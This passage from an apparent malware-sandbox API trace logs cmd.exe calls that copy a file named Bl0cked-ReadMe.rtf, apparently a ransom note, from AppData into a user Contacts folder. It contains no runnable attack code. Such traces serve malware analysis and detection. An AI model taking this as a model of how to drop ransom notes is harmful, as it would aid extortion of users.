lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0208.867] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x16f8b0, lpFilePart=0x16f8ac | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x16f8ac*="Desktop") returned 0x18 [0208.867] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0208.868] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f62c | out: lpFindFileData=0x16f62c) returned 0x1efff8 [0208.868] FindClose (in: hFindFile=0x1efff8 | out: hFindFile=0x1efff8) returned 1 [0208.868] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x16f62c | out: lpFindFileData=0x16f62c) returned 0x1efff8 [0208.868] FindClose (in: hFindFile=0x1efff8 | out: hFindFile=0x1efff8) returned 1 [0208.868] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x16f62c | out: lpFindFileData=0x16f62c) returned 0x1efff8 [0208.868] FindClose (in: hFindFile=0x1efff8 | out: hFindFile=0x1efff8) returned 1 [0208.868] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0208.868] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0208.868] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0208.868] GetEnvironmentStringsW () returned 0x1f2ad8* [0208.868] FreeEnvironmentStringsW (penv=0x1f2ad8) returned 1 [0208.868] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0208.869] GetConsoleOutputCP () returned 0x1b5 [0208.869] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0208.869] GetUserDefaultLCID () returned 0x409 [0208.869] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0208.869] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16f9f0, cchData=128 | out: lpLCData="0") returned 2 [0208.869] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16f9f0, cchData=128 | out: lpLCData="0") returned 2 [0208.869] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16f9f0, cchData=128 | out: lpLCData="1") returned 2 [0208.869] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0208.869] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0208.870] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0208.870] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0208.870] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0208.870] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0208.870] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0208.870] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0208.870] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0208.870] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0208.870] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0208.871] GetConsoleTitleW (in: lpConsoleTitle=0x1e08d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0208.871] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0208.871] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0208.871] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0208.871] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0208.872] _wcsicmp (_String1="type", _String2=")") returned 75 [0208.872] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0208.872] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0208.872] _wcsicmp (_String1="IF", _String2="type") returned -11 [0208.872] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0208.872] _wcsicmp (_String1="REM", _String2="type") returned -2 [0208.872] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0208.875] _get_osfhandle (_FileHandle=1) returned 0x7 [0208.875] _get_osfhandle (_FileHandle=1) returned 0x7 [0208.875] _get_osfhandle (_FileHandle=1) returned 0x7 [0208.875] GetFileType (hFile=0x7) returned 0x2 [0208.875] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0208.875] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f8e8 | out: lpMode=0x16f8e8) returned 1 [0208.875] _dup (_FileHandle=1) returned 3 [0208.875] _close (_FileHandle=1) returned 0 [0208.876] _wcsicmp (_String1="C:\\Users\\Default\\Contacts\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0208.876] CreateFileW (lpFileName="C:\\Users\\Default\\Contacts\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\default\\contacts\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x16f8b8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0208.877] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0208.877] GetConsoleTitleW (in: lpConsoleTitle=0x16f6e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0208.877] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0208.877] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0208.877] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0208.877] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0208.878] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0208.878] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x16f24c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16f24c) returned 0x1e0e50 [0208.878] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0208.878] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0208.878] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0208.878] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x16e158, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0208.878] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0208.878] _get_osfhandle (_FileHandle=4) returned 0x54 [0208.878] GetFileType (hFile=0x54) returned 0x1 [0208.878] _get_osfhandle (_FileHandle=4) returned 0x54 [0208.878] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x16e1b0 | out: lpFileSizeHigh=0x16e1b0*=0x0) returned 0x1632 [0208.879] _get_osfhandle (_FileHandle=4) returned 0x54 [0208.879] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0208.879] _get_osfhandle (_FileHandle=4) returned 0x54 [0208.879] ReadFile (in: hFile=0x54, lpBuffer=0x16efe8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e1d8, lpOverlapped=0x0 | out: lpBuffer=0x16efe8*, lpNumberOfBytesRead=0x16e1d8*=0x200, lpOverlapped=0x0) returned 1 [0208.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.880] GetFileType (hFile=0x4c) returned 0x1 [0208.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.880] GetFileType (hFile=0x4c) returned 0x1 [0208.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.880] WriteFile (in: hFile=0x4c, lpBuffer=0x16efe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16efe8*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.881] GetFileType (hFile=0x4c) returned 0x1 [0208.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.881] WriteFile (in: hFile=0x4c, lpBuffer=0x16f038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f038*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.881] GetFileType (hFile=0x4c) returned 0x1 [0208.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.881] WriteFile (in: hFile=0x4c, lpBuffer=0x16f088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f088*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.881] GetFileType (hFile=0x4c) returned 0x1 [0208.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.881] WriteFile (in: hFile=0x4c, lpBuffer=0x16f0d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f0d8*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.881] GetFileType (hFile=0x4c) returned 0x1 [0208.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.881] WriteFile (in: hFile=0x4c, lpBuffer=0x16f128*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f128*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.881] GetFileType (hFile=0x4c) returned 0x1 [0208.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.881] WriteFile (in: hFile=0x4c, lpBuffer=0x16f178*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f178*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.881] GetFileType (hFile=0x4c) returned 0x1 [0208.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.881] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1c8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f1c8*, lpNumberOfBytesWritten=0x16e1cc*=0x20, lpOverlapped=0x0) returned 1 [0208.881] _get_osfhandle (_FileHandle=4) returned 0x54 [0208.881] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e1b8 | out: lpNewFilePointer=0x0) returned 1 [0208.882] _get_osfhandle (_FileHandle=4) returned 0x54 [0208.882] ReadFile (in: hFile=0x54, lpBuffer=0x16efe8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e1d8, lpOverlapped=0x0 | out: lpBuffer=0x16efe8*, lpNumberOfBytesRead=0x16e1d8*=0x200, lpOverlapped=0x0) returned 1 [0208.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.882] GetFileType (hFile=0x4c) returned 0x1 [0208.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.882] GetFileType (hFile=0x4c) returned 0x1 [0208.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.882] WriteFile (in: hFile=0x4c, lpBuffer=0x16efe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16efe8*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.882] GetFileType (hFile=0x4c) returned 0x1 [0208.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.882] WriteFile (in: hFile=0x4c, lpBuffer=0x16f038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f038*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.882] GetFileType (hFile=0x4c) returned 0x1 [0208.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.882] WriteFile (in: hFile=0x4c, lpBuffer=0x16f088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f088*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.882] GetFileType (hFile=0x4c) returned 0x1 [0208.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.882] WriteFile (in: hFile=0x4c, lpBuffer=0x16f0d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f0d8*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.882] GetFileType (hFile=0x4c) returned 0x1 [0208.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.882] WriteFile (in: hFile=0x4c, lpBuffer=0x16f128*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f128*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.882] GetFileType (hFile=0x4c) returned 0x1 [0208.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.882] WriteFile (in: hFile=0x4c, lpBuffer=0x16f178*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f178*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.882] GetFileType (hFile=0x4c) returned 0x1 [0208.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.882] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1c8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f1c8*, lpNumberOfBytesWritten=0x16e1cc*=0x20, lpOverlapped=0x0) returned 1 [0208.882] _get_osfhandle (_FileHandle=4) returned 0x54 [0208.883] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e1b8 | out: lpNewFilePointer=0x0) returned 1 [0208.883] _get_osfhandle (_FileHandle=4) returned 0x54 [0208.883] ReadFile (in: hFile=0x54, lpBuffer=0x16efe8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e1d8, lpOverlapped=0x0 | out: lpBuffer=0x16efe8*, lpNumberOfBytesRead=0x16e1d8*=0x200, lpOverlapped=0x0) returned 1 [0208.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.883] GetFileType (hFile=0x4c) returned 0x1 [0208.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.883] GetFileType (hFile=0x4c) returned 0x1 [0208.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.883] WriteFile (in: hFile=0x4c, lpBuffer=0x16efe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16efe8*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.883] GetFileType (hFile=0x4c) returned 0x1 [0208.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.883] WriteFile (in: hFile=0x4c, lpBuffer=0x16f038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f038*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.883] GetFileType (hFile=0x4c) returned 0x1 [0208.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.883] WriteFile (in: hFile=0x4c, lpBuffer=0x16f088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f088*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.883] GetFileType (hFile=0x4c) returned 0x1 [0208.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.883] WriteFile (in: hFile=0x4c, lpBuffer=0x16f0d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f0d8*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.883] GetFileType (hFile=0x4c) returned 0x1 [0208.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.883] WriteFile (in: hFile=0x4c, lpBuffer=0x16f128*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f128*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.883] GetFileType (hFile=0x4c) returned 0x1 [0208.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.883] WriteFile (in: hFile=0x4c, lpBuffer=0x16f178*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f178*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.883] GetFileType (hFile=0x4c) returned 0x1 [0208.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.883] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1c8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f1c8*, lpNumberOfBytesWritten=0x16e1cc*=0x20, lpOverlapped=0x0) returned 1 [0208.883] _get_osfhandle (_FileHandle=4) returned 0x54 [0208.884] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e1b8 | out: lpNewFilePointer=0x0) returned 1 [0208.884] _get_osfhandle (_FileHandle=4) returned 0x54 [0208.884] ReadFile (in: hFile=0x54, lpBuffer=0x16efe8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e1d8, lpOverlapped=0x0 | out: lpBuffer=0x16efe8*, lpNumberOfBytesRead=0x16e1d8*=0x200, lpOverlapped=0x0) returned 1 [0208.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.884] GetFileType (hFile=0x4c) returned 0x1 [0208.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.884] GetFileType (hFile=0x4c) returned 0x1 [0208.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.884] WriteFile (in: hFile=0x4c, lpBuffer=0x16efe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16efe8*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.884] GetFileType (hFile=0x4c) returned 0x1 [0208.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.884] WriteFile (in: hFile=0x4c, lpBuffer=0x16f038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f038*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.884] GetFileType (hFile=0x4c) returned 0x1 [0208.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.884] WriteFile (in: hFile=0x4c, lpBuffer=0x16f088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f088*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.884] GetFileType (hFile=0x4c) returned 0x1 [0208.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.884] WriteFile (in: hFile=0x4c, lpBuffer=0x16f0d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f0d8*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.884] GetFileType (hFile=0x4c) returned 0x1 [0208.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.884] WriteFile (in: hFile=0x4c, lpBuffer=0x16f128*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f128*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.884] GetFileType (hFile=0x4c) returned 0x1 [0208.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.884] WriteFile (in: hFile=0x4c, lpBuffer=0x16f178*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f178*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.884] GetFileType (hFile=0x4c) returned 0x1 [0208.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.884] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1c8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f1c8*, lpNumberOfBytesWritten=0x16e1cc*=0x20, lpOverlapped=0x0) returned 1 [0208.885] _get_osfhandle (_FileHandle=4) returned 0x54 [0208.885] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e1b8 | out: lpNewFilePointer=0x0) returned 1 [0208.885] _get_osfhandle (_FileHandle=4) returned 0x54 [0208.885] ReadFile (in: hFile=0x54, lpBuffer=0x16efe8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e1d8, lpOverlapped=0x0 | out: lpBuffer=0x16efe8*, lpNumberOfBytesRead=0x16e1d8*=0x200, lpOverlapped=0x0) returned 1 [0208.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.885] GetFileType (hFile=0x4c) returned 0x1 [0208.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.885] GetFileType (hFile=0x4c) returned 0x1 [0208.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.885] WriteFile (in: hFile=0x4c, lpBuffer=0x16efe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16efe8*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.885] GetFileType (hFile=0x4c) returned 0x1 [0208.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.885] WriteFile (in: hFile=0x4c, lpBuffer=0x16f038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f038*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.885] GetFileType (hFile=0x4c) returned 0x1 [0208.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.885] WriteFile (in: hFile=0x4c, lpBuffer=0x16f088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f088*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.885] GetFileType (hFile=0x4c) returned 0x1 [0208.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.885] WriteFile (in: hFile=0x4c, lpBuffer=0x16f0d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f0d8*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.885] GetFileType (hFile=0x4c) returned 0x1 [0208.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.885] WriteFile (in: hFile=0x4c, lpBuffer=0x16f128*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f128*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.885] GetFileType (hFile=0x4c) returned 0x1 [0208.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.885] WriteFile (in: hFile=0x4c, lpBuffer=0x16f178*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f178*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.886] GetFileType (hFile=0x4c) returned 0x1 [0208.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.886] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1c8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f1c8*, lpNumberOfBytesWritten=0x16e1cc*=0x20, lpOverlapped=0x0) returned 1 [0208.886] _get_osfhandle (_FileHandle=4) returned 0x54 [0208.886] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e1b8 | out: lpNewFilePointer=0x0) returned 1 [0208.886] _get_osfhandle (_FileHandle=4) returned 0x54 [0208.886] ReadFile (in: hFile=0x54, lpBuffer=0x16efe8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e1d8, lpOverlapped=0x0 | out: lpBuffer=0x16efe8*, lpNumberOfBytesRead=0x16e1d8*=0x200, lpOverlapped=0x0) returned 1 [0208.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.886] GetFileType (hFile=0x4c) returned 0x1 [0208.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.886] GetFileType (hFile=0x4c) returned 